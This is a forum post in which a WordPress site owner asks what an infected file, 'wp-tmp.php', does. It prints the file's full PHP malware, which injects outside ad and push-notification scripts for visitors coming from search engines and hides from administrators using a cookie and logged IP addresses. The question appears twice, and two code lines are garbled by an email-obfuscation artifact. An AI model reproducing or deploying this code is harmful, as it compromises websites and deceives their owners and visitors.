I found this virus on My WordPress on wp-includes/ Files that has scan by siteguarding.com and other and found bad scripts ad
<h1>this content file "wp-tmp.php" :</h1>
<div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false">
<div class="snippet-code">
<pre class="snippet-code-html lang-html prettyprint-override">
</div>
</div>
What was this file doing?
And how is know that file is insert on my website file root ?
I have chating with siteguarding.com support and tell me "Your website is hacked"
wp-includes/wp-tmp.php - 100% virus
up/includes/functions.php - 100% virus
you are in blacklist
<h1>this content file "wp-tmp.php" :</h1>
<div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false">
<div class="snippet-code">
<pre class="snippet-code-html lang-html prettyprint-override">
Code:
ini_set('display_errors', 0);
error_reporting(0);
$anx='a107e0b262722f0cea3f7ce097597b7c';
if ( ! function_exists( 'slider_option' ) ) {
function slider_option($content){
if(is_single())
{
$con = '
';
$con2 = '
<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>
';
$content=$content.$con2;
}
return $content;
}
function slider_option_footer(){
if(!is_single())
{
$con2 = '
<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>
';
echo $con2;
}
}
function setting_my_first_cookie() {
setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
}
if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}
if( current_user_can('edit_others_pages'))
{
if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
}
}
$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
if (strpos($ref,$source)!==false) {
setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
$sevisitor=true;
}
}
if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
{
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}
}
}
}</div>
What was this file doing?
And how is know that file is insert on my website file root ?
I have chating with siteguarding.com support and tell me "Your website is hacked"
wp-includes/wp-tmp.php - 100% virus
up/includes/functions.php - 100% virus
you are in blacklist